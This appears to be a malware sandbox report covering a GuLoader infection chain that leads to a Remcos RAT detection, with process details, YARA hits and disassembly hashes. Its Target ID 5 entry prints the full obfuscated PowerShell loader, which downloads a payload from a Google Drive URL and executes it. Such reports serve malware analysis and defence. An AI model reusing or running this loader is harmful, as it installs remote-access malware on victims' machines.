                  Target ID:5
                  Start time:01:46:02
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBecrisCorre1Pikan2M cac ');$Exaltations=$Seriately[0];$Nongratifying=(Omhng120 'Songo$ AlumgM slyl RidsOStedmBRadioADel.nLOutpe:d skod O diy CaddeChampmMy coawindskPortaiSh ngN ccengSquad=ContaNPal ee BoerwGa,le- askOEtrusbP ppaJ postepursuCOran TBirac Arla sDrayiyt mposNonexTBo igeDruckmDiaki. BetinSlyngeVu.tuTRin e.VakuuwGanjaEOligabTils,cPirusLIntuiiDumdretrichnSkylltEndos ');Stungen ($Nongratifying);Stungen (Omhng120 'Donkr$ Int DPos ty MisteAncismTac.ya CounkFremeiSoftnnSubskgtwa d. iltrHCollieP steaUno edNa.opeumba ranodesRmega[Misto$SarifOMultidGlo,se RondlColomeCharat Medb]Front= List$ .aktATaktat OvertStra.r KlipiGlaurbPiratuOvonit stanvinde r CruodSpot iT.teleHous,rBeta nutense Reag ');$indledningers=Omhng120 'Inter$ .urpD L,ddyUnde eUncoummisdoaPer ek stofi.ebninjesuigG mcr. AlviD umfooDecenw ndsntevanlModneoMa agaKolbedSoldeF HeliiUn.nel Imdee riv( Kont$LektuEMavesx BinaaSkak.lXyloftInteraInjektTv reiMandjoFlippn Forms orag, gi t$SrklaMKrakee c epgBlamaaUnstar IjmaaInsti)psyko ';$Megara=$Istandsttende;Stungen (Omhng120 'Ndtrf$ ouquG tooll rikiOAlmacBOpfriaToothlProd :GefilD Inteo BesiNTyphousoci tBitniSLaman= njoi(gmelitResurEBaandsFlas,t Ildr-otozop AddraB,styt omfrHPeasa Chaws$TrnermBl baEBrideGBeroeaBlyglrAfsteABland)Omfo, ');while (!$Donuts) {Stungen (Omhng120 'Delef$JentrgRiflilKem koColosbUnsu a Schel exah:HvlviDBec siFrontdP ecrySesqunListeaUdfldmSucrai GaveaThion=Udrad$.utoltOmbytrfrogfu.lleseW,yme ') ;Stungen $indledningers;Stungen (Omhng120 'StiffSPreobtColosaLaeotrS tratChiff- UdasSVouchlJews eSepale opplpBinds Abote4Leads ');Stungen (Omhng120 'Hastv$T.ikogOve flL veroJ,nglbDeadwa selelOmgng:Asse DHvneroStemnnMang,uOwnsutLakfasPri,r= U ex(bo igT PacheCiff sOv.rptOldeb-Pa,esP ChiaaUl entU sanhUse e To on$ UnguM VermeGenkog BlodaF,dlar adioaRasor)Obers ') ;Stungen (Omhng120 'Overs$Utakng AllelCl,sso Bu,nbForlaa VedllForha:RevirT ,ouraNonsem Ro deHayag= Med $Telefg WiltlmoutooHetaebel,owaIndf,lmonos: EnerFHandsiSiks lPretrmLun rsDromot summr Derbi EctomPoli mPhotoeOve,nlHuers+Acina+Disbe%Under$,andsS ungeeUnb arReseriAccu.a Gen tunhare fblalSlummyAnt.r.LaramcSmallo SkyduAfskrnSybiltMaves ') ;$Exaltations=$Seriately[$Tame];}$Eksekverbare=282308;$trikstank=31667;Stungen (Omhng120 'C rom$ motigCirculTagryoMiliebForloaG.bbel S pr:NonemJBlacku Eftel orudeAllerm BluneForbis puppsNoveme LrernidiomsWab,t Repe=Akupu .aatGAdelseAandftGen r- maniCInsinoGrnsen EgentL,tbee reennFraflt ndel Unr p$.outiMro aieOpkalgGutsiaPilferKle oa She, ');Stungen (Omhng120 ' ore$Forsvgtmmerl Ens o CarbbPseudaRkkevlBev s:FormaEAspacxS ptopC rkelFriediFj rncFlyn aSunfibSvaeriLokall Nippi roustBlaahyTopsp rind=W shi Retor[ xureSNotoryTil.ys salvtContaeEmanumneote.KefsfCAu tlo.odifnHyn,sv Reole DamprL.gkatNumbb]Skatt:Proec:MetteFF dusrSkitsoChargmInterBBe liaStvnisforfeeCro.k6 egle4 itheSFrosttLatherAmpleiAblatnPrologPalae(Belam$ Au oJDe maustranlGoyineEndotmCommieSeggas ecisMali.e NectnAntics Akti)Besla ');Stungen (Omhng120 'Missu$SubvegfravrlTaksto portb Re saNinetlGalvv:Leg nTFlymehTrapioEnh dmCordiiBrugesD cklt Ac u Uddan=Confi Afpa[ MetaS Ect y Genes.ipsot harie rdomm Stev.Musk,TOmproeSek nx Othatindkr. SecaEAlv onEctrocOrigioErkyndBryoniSneadnVillig ,ntr]Soci :rgneh:StilmABrnepS ynonCP.laeISaracIBetj .SeersGUndereEnwrit pannS Umrktbassar trici otanGamb g over( Coxe$DrapeE Se uxN,nmapCranilFerdyiSleigcKamgaaAdaptb Gappi.aabul Tek iFolket DiacyDisco) Farv ');Stungen (Omhng120 'Samme$CircugTasselVens.oRhi ebS elnaBothilThaum:HvidkoHoggepMolalsMet gt BesktO teaeIndbanGonord StateDem t=Downv$DisemTNaturhUn raoBagr.mPersoiSprkfs Blegt M zz.Hove.sDe,umuanstrbEmbiosJydettOptakrT staiBeslanRsonngP haw( .iva$TanisE R.mpkLymphsHu hjedaakakD shevVrvleeHeracrSubcob So aa A derSamleeParti, apot$Laze.tM diarShoppi Foolk fluisForgat ver aUndernportskD,tal)Echiu ');Stungen $opsttende;"
                  Imagebase:0xfa0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1924109372.0000000008CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1906272544.000000000611D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1930442779.000000000BDEC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:01:46:02
                  Start date:01/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6ee680000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:01:46:19
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\msiexec.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\msiexec.exe"
                  Imagebase:0x3c0000
                  File size:59'904 bytes
                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:12
                  Start time:01:46:32
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\msiexec.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                  Imagebase:0x3c0000
                  File size:59'904 bytes
                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FFB4B22B276 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623014131.00007FFB4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b220000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ?R*\$?R*\
                    • API String ID: 0-4001631058
                    • Opcode ID: be62efa219520ecdd154bdd958746009c05bb3ec1036adbd693aa95fa3faa87c
                    • Instruction ID: 2782d3d434faf9c1a401ee13f4364479a1c694b3962cb3fa591d0be4aa5f46c2
                    • Opcode Fuzzy Hash: be62efa219520ecdd154bdd958746009c05bb3ec1036adbd693aa95fa3faa87c
                    • Instruction Fuzzy Hash: 87F1A77091CA4D8FEBA8EF28C8557E97BD1FF54310F04826EE84DC7291DB7499458B82
                    Function 00007FFB4B22C022 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623014131.00007FFB4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b220000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ?R*\$?R*\
                    • API String ID: 0-4001631058
                    • Opcode ID: e4676374ec5549fdbac90bf05c84e789359289e80f6767e675a1d4df8ee6bdad
                    • Instruction ID: c8eb3d7c80568b8bb84cc94614d53f81d3331491eb398c682546eeb5c9782b35
                    • Opcode Fuzzy Hash: e4676374ec5549fdbac90bf05c84e789359289e80f6767e675a1d4df8ee6bdad
                    • Instruction Fuzzy Hash: CAE1927090CA4D8FEBA8EF28C8557E97BD1FF54310F14826AE84DC7291CE74A9458782
                    Function 00007FFB4B2FA09A Relevance: .5, Instructions: 542COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 44d8d03996eeed2c8ea57b4be74568b6c2ea5989276874f6c4f2db43e2a400d0
                    • Instruction ID: 98a939fc4e611ae530914b87d81ab8814c925f58c745b7aa648d07b499708a6b
                    • Opcode Fuzzy Hash: 44d8d03996eeed2c8ea57b4be74568b6c2ea5989276874f6c4f2db43e2a400d0
                    • Instruction Fuzzy Hash: 8A0206A290EBC51FE796AB7889652647FF1EF57210F0841FED088CB1A3DD199C4AC352
                    Function 00007FFB4B22BC36 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623014131.00007FFB4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b220000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ?R*\$?R*\
                    • API String ID: 0-4001631058
                    • Opcode ID: 40b986c3a54c9bde285d64882aaf0fe6fc0ea8382984afa3946a9baead6b3d89
                    • Instruction ID: 14ea351c0c4957c8be3f59f6409a27219b3775a04f53f60465b1f15b0937a5e8
                    • Opcode Fuzzy Hash: 40b986c3a54c9bde285d64882aaf0fe6fc0ea8382984afa3946a9baead6b3d89
                    • Instruction Fuzzy Hash: BCB1957050CA8D8FEB69EF38D8557E93BE1EF55310F04826EE84DC7292CA749945CB82
                    Function 00007FFB4B22E515 Relevance: 2.4, Strings: 1, Instructions: 1124COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623014131.00007FFB4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b220000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: [N_^
                    • API String ID: 0-4139567645
                    • Opcode ID: 46a295acf3c017edd2c5bc91e25c54f7f91f6074ff771e0178ee44e6cc4f3927
                    • Instruction ID: 8bbce07b3095b1278674e0d13e159e8ba1f929ea1d55a8b7694b966f2e92f9ce
                    • Opcode Fuzzy Hash: 46a295acf3c017edd2c5bc91e25c54f7f91f6074ff771e0178ee44e6cc4f3927
                    • Instruction Fuzzy Hash: E4521971A1CA498FDB99FF2CC495AE97FE1FF59310F1441BAD449C72A2CA34A842C781
                    Function 00007FFB4B2F4479 Relevance: .5, Instructions: 545COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 510cd9810f82922f49b7062e136038c6169ef94971dfb07d727022102fdf293f
                    • Instruction ID: ce89ab3d0ed40fcf244b6646711275bbfcdc340b3f3ee42b80b2482e73e1f5d0
                    • Opcode Fuzzy Hash: 510cd9810f82922f49b7062e136038c6169ef94971dfb07d727022102fdf293f
                    • Instruction Fuzzy Hash: 81F116E291DFC60FE36AFA7C88651747FD1EF56210B0841FBD199C71E3D94858068392
                    Function 00007FFB4B2F8CBD Relevance: .5, Instructions: 475COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ff1ced9f0f06e4e38cc8d16e86796bf5c9b0a8e504759519c073e111f318029
                    • Instruction ID: ae140e8d849efdf2d4de1edada3f482575f6de9b9dfae1d3099a7f7e4ab5ecba
                    • Opcode Fuzzy Hash: 3ff1ced9f0f06e4e38cc8d16e86796bf5c9b0a8e504759519c073e111f318029
                    • Instruction Fuzzy Hash: 7AE1F6A2A0DB894FE796BF788855174BFD2EF55210F1841FED18CCB1A3DD289C468392
                    Function 00007FFB4B2F541D Relevance: .4, Instructions: 376COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9afe895ca9ea8e851d3a6afab6676b23ad80adb5183b1bed529ce310f98655bd
                    • Instruction ID: 2506ab0f8fe100108e8ee6d91ee8fce5c0c09b9614e3dfc0982523a769596401
                    • Opcode Fuzzy Hash: 9afe895ca9ea8e851d3a6afab6676b23ad80adb5183b1bed529ce310f98655bd
                    • Instruction Fuzzy Hash: DEB136E2A1DB8A0FE7A5FEB888695B97FD1EF45310B0841FBD14DC71A3D9089C058385
                    Function 00007FFB4B2F9422 Relevance: .3, Instructions: 325COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb4119cbbdbb7c5c5d1a4466d928e8ddd9361bd99208870999d52a2995c748cf
                    • Instruction ID: 825763550f1d6149e22e8c76ddd9433e754d76dcc4195abe4ec38d4ccb9b3f19
                    • Opcode Fuzzy Hash: fb4119cbbdbb7c5c5d1a4466d928e8ddd9361bd99208870999d52a2995c748cf
                    • Instruction Fuzzy Hash: 7D9136E2A0DB990FEB96BE7888545B47FE1EF66214B0841FBC589C71E3D909EC05C391
                    Function 00007FFB4B2F9E2A Relevance: .2, Instructions: 250COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ba89ddfa09e1ae261c881ecb06ee4509e2eeaba6c35f24ec981b412f8e7482e
                    • Instruction ID: 1714fb17c0b8411aa0c88afd77e3f9268602d290f061539390bfce9070ce39fb
                    • Opcode Fuzzy Hash: 9ba89ddfa09e1ae261c881ecb06ee4509e2eeaba6c35f24ec981b412f8e7482e
                    • Instruction Fuzzy Hash: FE71E5A290E7D94FE753FF7898515A47FE1EF63214B0841FBD188CB0A3D918984AC392
                    Function 00007FFB4B2F9527 Relevance: .2, Instructions: 232COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 30e9712250e86c43f9228b920539821bbd4793fd0920d03f598224a0a1725fd2
                    • Instruction ID: cde1e90285d2697c0be2f8bd23fb45346a280687d745841f236b1f213cc9d62e
                    • Opcode Fuzzy Hash: 30e9712250e86c43f9228b920539821bbd4793fd0920d03f598224a0a1725fd2
                    • Instruction Fuzzy Hash: 346126E290DBD90FEB96FEB888945647FE0EF66204B0840FFD189CB0A3C9199C45C781
                    Function 00007FFB4B2F9661 Relevance: .1, Instructions: 131COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e934aa7682732dd9ee7e89420e5a50ae76f940f338f90f55691d741a364fb79
                    • Instruction ID: 4e11bc8107d4800858a810cc4411d8093c68b4c4f0da34adc2e3727aaf4f0047
                    • Opcode Fuzzy Hash: 1e934aa7682732dd9ee7e89420e5a50ae76f940f338f90f55691d741a364fb79
                    • Instruction Fuzzy Hash: A741F8E290DBD90FEB56FE7888544657FE0EF66204B4840FBD588CB0E3D918AC05C751
                    Function 00007FFB4B2F5542 Relevance: .1, Instructions: 114COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3480fbdbbcf52816b454295330d8742432cfedda08b8edb6705eda3988f562aa
                    • Instruction ID: d44f41e8b288e0608cb49fe657894932ca4bcd38a078f6c669784c73acf4a16f
                    • Opcode Fuzzy Hash: 3480fbdbbcf52816b454295330d8742432cfedda08b8edb6705eda3988f562aa
                    • Instruction Fuzzy Hash: E031E6D2D2EA870FF7A6BEB899651786EC2EF05750B4800BAD55DC31E3ED0C5C045296
                    Function 00007FFB4B2F4604 Relevance: .1, Instructions: 100COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f02518cdb59f560678b1c69f4883a776fa70a11971d53e2db54a09ae94b3263b
                    • Instruction ID: a02e6c524e66e0e55a346e8cd7ade54dac65b02abaccddf65e6480a0957bd37c
                    • Opcode Fuzzy Hash: f02518cdb59f560678b1c69f4883a776fa70a11971d53e2db54a09ae94b3263b
                    • Instruction Fuzzy Hash: 802139E2E0DE4A0FF3A5FEBC95551746EC2EF88210B4840BAD65CC71A3DC589C055241
                    Function 00007FFB4B22B734 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623014131.00007FFB4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b220000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0fc5abb35e7be4ae5828494c6c792c084391145ceddd2eda1fc86668310bb90b
                    • Instruction ID: 1f877c88ceba1832ec61bd814afc5ef3bd6776858704c1e4fdc222e64a049231
                    • Opcode Fuzzy Hash: 0fc5abb35e7be4ae5828494c6c792c084391145ceddd2eda1fc86668310bb90b
                    • Instruction Fuzzy Hash: 8231EBB181D64E8EFBB8BF24CD1ABFA3690FF45315F404539D54DC60A2DA386985CA12
                    Function 00007FFB4B2F19AF Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6eb46bc4e08d35e5894f5f1bcf8897307fbf68478e619b09227bd59205475a2d
                    • Instruction ID: 89d9365a11e8e30cb65e9c5daee728fd1a8d0b8c47216b5a21495b190341c764
                    • Opcode Fuzzy Hash: 6eb46bc4e08d35e5894f5f1bcf8897307fbf68478e619b09227bd59205475a2d
                    • Instruction Fuzzy Hash: 6C21F4D2D0E7C60FF3A5BAB889662646FC1EF56651B4844FED089D71E3DC08580A8392
                    Function 00007FFB4B2F9C76 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0b6e7a07ecc225d34b9aab1fa93e228c7240a2744e3dc444a7a30d8b578878cf
                    • Instruction ID: a78e5e341b654b0ce47de8170b7beef47a0a0efd123eb6173827cc234eeb0e4a
                    • Opcode Fuzzy Hash: 0b6e7a07ecc225d34b9aab1fa93e228c7240a2744e3dc444a7a30d8b578878cf
                    • Instruction Fuzzy Hash: 1B21C2E2A0E7954FE76ABB789C551E8BFE1EF56214F0401FAE08C83093DD286D058791
                    Function 00007FFB4B2F7ACB Relevance: .1, Instructions: 62COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2fcabbe222dbeae6c1091641cea1937e962808aee13aa1dc4453f84ae6d79b16
                    • Instruction ID: e2ab57c2d2e19e87eba99bd172b8440c888907dba27a76df364e0144652325bf
                    • Opcode Fuzzy Hash: 2fcabbe222dbeae6c1091641cea1937e962808aee13aa1dc4453f84ae6d79b16
                    • Instruction Fuzzy Hash: 5611C2E2A0EAC91FE7A6FA78C8518A56FD1EF1664070904FED089CB1E7E8089D448391
                    Function 00007FFB4B2241E5 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623014131.00007FFB4B220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b220000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                    • Instruction ID: cbcb299ba3751173dfca346e33192889b0d6461e3300871c66bd3183446ad27d
                    • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                    • Instruction Fuzzy Hash: 3901677111CB0C8FD748EF0CE451AA6B7E0FB95364F10056DE58AC3665DA36E882CB46
                    Function 00007FFB4B2F74EA Relevance: .0, Instructions: 37COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 441cb4191dcabbb1174b5047aafd3f90bc4754f73dd559116deecac616378c73
                    • Instruction ID: 7fc181f23ed8ef7e5c21d1ba839304c20cdc9c3407b0297b3ab09ac1a9361c75
                    • Opcode Fuzzy Hash: 441cb4191dcabbb1174b5047aafd3f90bc4754f73dd559116deecac616378c73
